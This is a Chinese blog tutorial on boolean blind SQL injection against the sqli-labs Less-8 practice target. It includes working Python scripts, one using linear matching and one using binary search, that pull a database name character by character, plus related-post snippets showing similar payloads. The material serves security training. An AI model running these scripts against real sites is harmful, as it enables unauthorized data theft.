sql注入之bool盲注

已于 2024-05-18 22:46:28 修改
阅读量632 收藏 7
点赞数 15
分类专栏: 渗透学习 文章标签: 网络安全
于 2024-05-12 07:41:20 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/banliyaoguai/article/details/138740278
版权

目录

简介

盲注步骤

1、进入靶场

2、如下图所示输入?id=1‘ 判断此时存在注入点

3、判断列数

​编辑 4、开始盲注

普通的python脚本

代码思想

结果

二分查找python脚本

二分查找算法思想简介

二分查找与普通查找的主要差距

代码思想

代码

结果​编辑

简介

盲注就是在sql注入过程中,sql语句执行的选择后,选择的数据不能回显到前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个过程称之为盲注。

对于基于布尔的盲注来说,我们可以构造一条注入语句来测试我们输入的布尔表达式,而这布尔表达式结果的真假,决定了每次页面有不同的反应。

下面以sql_labs靶场第八关来理解一下bool盲注

盲注步骤

1、进入靶场

2、如下图所示输入?id=1‘ 判断此时存在注入点

3、判断列数

列又3变为4时You are in.....消失,说明存在三列 

 4、开始盲注

然后我们可以开始进行注入,可以使用substr函数对数据库名进行猜测。对substr切割出来的字符进行一个ascli编码,然后和ascli编码比较,根据结果确定数据库的名称

如下图,当你测试到115时,图中会显示You are in...

然后可以调整sql语句,直到找到database()的名字,但是如果手动一个个的话要花费的时间太久了,所以我们编写一个python脚本来进行盲注

普通的python脚本

代码思想

创建一个字符集然后数据库的每个位置的字符和字符集中的字符进行比对,若两者相等则字符集中字符存入dataname中,最终显示dataname

代码

# 白大黑
# 开发时间:$[DATE] $[TIME]
import requests
def get_database(url):
    dataname = ''  # 初始化一个空字符串用于存储数据库名
    dict = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'  #数据库名可能存在这些字段中
    # 循环数据库名的位置
    for i in range(1, 20):
        for j in dict:
            #注入语句
            payload = "1' AND SUBSTRING((SELECT DATABASE()), %d, 1) = '%s'-- " % (i, j)
            # 发送请求
            res = requests.get(url, params={"id": payload})
            # 如果字符匹配上了,屏幕会输出You are in,所以可以用You are in来检测是否字符是否可以匹配
            if "You are in" in res.text:
                dataname += j
                print(dataname)
                break
            else:
                continue
    return dataname

# 此处填写自己靶场地址
url = 'http://127.0.0.1:9002/sqli-labs-master/Less-8/'
db_name = get_database(url)
结果

二分查找python脚本

但时刚刚的脚本还不是很好,它的查找速率不是很快。所以我们可以对算法进行一下优化,将上面的代码中查找的算法替换成二分查找。

二分查找算法思想简介

二分法的思想很简单,因为整个数组是有序的,数组默认是递增的。

首先选择数组中间的数字和需要查找的目标值比较

如果相等最好,就可以直接返回答案了

如果不相等

如果中间的数字大于目标值,则中间数字向右的所有数字都大于目标值,全部排除

如果中间的数字小于目标值,则中间数字向左的所有数字都小于目标值,全部排除

二分查找与普通查找的主要差距

效率:二分查找的效率远高于普通查找。由于二分查找采用了分治策略,每次都将查找范围缩小一半,因此其时间复杂度为O(log n),而普通查找的时间复杂度为O(n)。

前提条件:二分查找要求数组必须是有序的,而普通查找则没有这一要求。因此,在使用二分查找之前,需要先对数组进行排序。

应用场景:由于二分查找效率高,因此适用于大规模数据的查找;而普通查找则更适用于小规模数据或对数据有序性没有要求的情况。

(正好我们的盲注过程符合二分查找的条件)

代码思想

将要查找的字段编码成ascii码,同ascii码进行比较,ascii相同,该ascii对应的字母就是数据库名称

同ascii进行比较的那一段换成二分法。

代码

# 白大黑
# 开发时间:$[DATE] $[TIME]
import requests
def half(url):
    name = ''
    for i in range(1, 20):
        #从空格开始 直到到~
        low = 32
        high = 126
        mid = (low + high) // 2
        while low < high:
            payload = "1' and ascii(substr(database(),%d,1))> %d-- " % (i, mid)
            params = {"id":payload}
            r = requests.get(url, params=params)
            if 'You are in' in r.text:
                low = mid + 1
            else:
                high = mid
            mid = (low + high) // 2
        if mid == 32:
            break
        name += chr(mid)
        print(name)
url = 'http://127.0.0.1:9002/sqli-labs-master/Less-8/'
half(url)
结果
sql注入练习之bool盲注
windStudyer的专栏
05-22 1190
1.bool盲注的原理 以根据返回页面判断条件真假的注入 判断方式: 通过长度判断 length(): length(database())>=x 通过字符判断 substr():substr(database() ,1,1)= 's' 通过 ascII 码判断:ascii():ascii(substr(database(),1,1)) =x 2.bool盲注相关的函数 3.实验-bool盲注 实验环境:phpstudy+apache+mysql+pikachu 3.1判断注入
SQL注入bool注入
studyphp123的博客
04-18 1259
一、预备知识 二、实验目的 三、实验工具 浏览器 四、实验环境 客户机一台 五、实验步骤 第一步:访问 http://www.any.com/sqli/Less-8/?id=1 页面正常: 第二步:加入单引号,访问 http://www.any.com/sqli/Less-8/?id=1' 不会报错,但是页面不正常,可以判断是bool注入: 第三步:判断列数(通过二分法) 1)输入:...
SQLi-LABS
m0_74855736的博客
03-14 852
单引号闭合确定数据库查询的字段数确定显示位查询当前数据库名,查询当前数据库下所有的表查询user表中的字段数查询字段的数据。
2.5 SQL布尔类型
最新发布
Python老吕的博客
09-28 1149
本章节将详细介绍SQL中的布尔类型,包括BOOLEAN类型及其在不同数据库系统中的实现,并探讨如何在实际应用中使用布尔类型。本专栏的内容基于SQL的通用概念和多个流行的数据库系统,如MySQL、PostgreSQL、SQL Server和Oracle。布尔类型是SQL中用于存储逻辑值的一种数据类型,尽管在不同的数据库系统中其实现方式可能不同,但其用途和操作都相对直观和一致。在这个数据驱动的时代,SQL作为最流行的数据库查询和编程语言之一,对于任何与数据打交道的专业人士来说都是一项必不可少的技能。
SQL注入Bool盲注(510cms)
qq_45775897的博客
01-05 3011
SQL注入之get可以参考: https://blog.csdn.net/qq_45775897/article/details/122332051 一、查找是否存在SQL注入注入点) 以510企业网站为例: 这里以漏洞参数id为例 用?id=1和id=1'进行测试,前提能够正常显示。 在?id=1后面加上and 1=1两个结果都是真的,所以正常输出; 后面加上and 1=2如果正常输出,说明前后都是真的,则表示是字符型。反之是数值型 eg: http://IP地址(域名)/news.php?cid=&
墨者 - SQL注入漏洞测试(布尔盲注)
weixin_43803070的博客
07-08 1461
** 一、报数据库名字 ** 1.根据浮动的通告进度条,找到sql注入点。 内容不变,判断是数字型注入。 http://219.153.49.228:44199/new_list.php?id=1 and 1=1 --+ 2.然后开始判断数据库名字的长度,1,2,3…内容空白。一直试,试到长度为10 http://219.153.49.228:44199/new_list.php?id=1%...
mysql bool盲注_sql bool盲注
weixin_30141859的博客
01-27 165
[CISCN2019 总决赛 Day2 Web1]Easyweb考察:robots.txtimage.php?bak文件泄露,image.php.bak可以下载别的不大行盲注php日志挂马=可以绕过检测初步工作进入8fd7a79f-9b3c-4c4b-9d03-c8e1b7006a3a.node3.buuoj.cn/robots.txtDisallow: *.php.bak对暴露的php文件进行测...
iwebsec靶场SQL注入-bool盲注
qq_56041380的博客
03-24 428
bool注入盲注的一种。它于报错注入不同,布尔注入没有任何报错信息输出,页面返回只有正常和不正常两种状态,攻击者只能通过返回的这两种状态来对其进行判断输入的SQL注入语句是否正确,从而判断数据库中存储了那些信息。
SQL注入——布尔盲注
TGFXK的博客
03-21 337
原理:前面几关都有数据回显,而在有的界面不会回显数据,只会显示对错,此时查库名等就比较难查,只能根据猜对错来判断。
sql注入之布尔盲注、延时盲注以及原理
maluxiao123的博客
03-30 1284
之前已经简单介绍了sql注入的基本原理,接下来会按照sql注入的各种类型一一进行梳理,sql注入的常见主要分为回显注入、报错注入bool盲注、延时注入、堆叠注入、二次注入、宽字节注入、http头注入、DNS LOAD注入。 1.布尔盲注 我们知道页面有回显可以确定回显位时可以进行回显注入,而没有回显的话,有sql报错页面可以使用报错注入,而一般设计完善的网站是会将sql报错的内容给屏蔽掉的。但是我们能判断页面是报错了,就算页面没有报错内容我们同样是有办法的,这时候我们可以使用盲注的方式来进行注入。 比如
综合bool盲注脚本.py
07-15
可以适用于部分SQL注入题目
bool_injection
02-13
布尔注入 考点 bool注入,通过页面返回的结果判断是否存在注入 启动 通过docker-compose启动 docker-compose up -d open http://127.0.0.1:8304 通过docker run启动 docker run -d -P print1n/bool_injection 版权 如果名义,请联系作者删除( )
SQL注入之基于布尔的盲注详解
09-10
首先说明的盲注注入的一种,指的是在不知道数据库返回值的情况下对数据中的内容进行猜测,实施SQL注入盲注一般分为布尔盲注和基于时间的盲注。这篇文章主要讲解的是基于布尔的盲注。下面来一起看看吧。
bool注入
qq_46540840的博客
03-14 849
sql注入-布尔盲注 以buuctf上的题具体来说 题目链接 方法一:布尔注入 方法二:报错注入 解题: 首先查看源代码:可以得到提示:得到一种思路:报错注入 这里拿布尔注入具体来说: 首先拿Bp判断: 输入name=admin &pass=1时:urldecode解码得到密码错误 name=1’or 1=1 # &pass=1 得到与1相同结果 name=1’or 1=2 # &pass=1得到是字符型注入 解释: 第一句是admin用户名是对的,密码不对 和第二局相对照 :
SQL注入漏洞-04】布尔盲注靶场实战
cc
02-03 6659
当我们改变前端页面传输给后台sql参数时,页面没有显示相应内容也没有显示报错信息时,不能使用联合查询注入和报错注入,这时我们可以考虑是否为基于布尔的盲注。 利用页面返回的布尔类型状态,正常或者不正常; 我们输入的语句让页面呈现出两种状态,相当于true和false,根据这两种状态可以判断我们输入的语句是否查询成功。布尔盲注就是根据这两种状态,来反推我们输入的条件是真还是假。以sqli-labs-masterless-8关为例
SQL注入--盲注入(bool型)
liukenn的博客
07-30 7776
一个带GET参数的网站,但是网页中没有返回任何查询结果和报错信息,只返回对和错: 盲注入格式: http://127.0.0.1/index.php?id=1' and ascii(substr( (SQL语句),1,1 ))=ASCII%23 注: SQL语句 输入SQL注入语句; ASCII 返回的字符的ASCII码; 1 第一个字母,从1开始算起;
bool盲注中用到的截取字符串的函数(mid、substr、left)
weixin_30917213的博客
02-09 491
介绍一下常用的:mid、substr、left 1、mid()函数 此函数为截取字符串一部分。MID(column_name,start[,length]) 参数 描述 column_name 必需。要提取字符的字段。 start 必需。规定开始...
sql注入-布尔盲注
WolvenSec的博客
06-02 1718
布尔盲注Boolean Blind SQL Injection)是一种SQL注入攻击技术,用于在无法直接获得查询结果的情况下推断数据库信息;它通过发送不同的SQL查询来观察应用程序的响应,进而判断查询的真假,并逐步推断出有用的信息。接着我们以DVWA靶场中的为例子进行解释;可以看到该靶场只能显示数据库中是否存在该ID,并不会显示其他数据,那么此时我们就无法直接获得查询结果的情况下推断数据库信息,因此联合查询已经无法满足要求,那么我们就可以使用布尔盲注或其他的注入思想突破。
Web安全原理剖析(三)——Boolean注入攻击
热门推荐
Phantom03167的博客
09-08 1万+
Boolean注入攻击
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值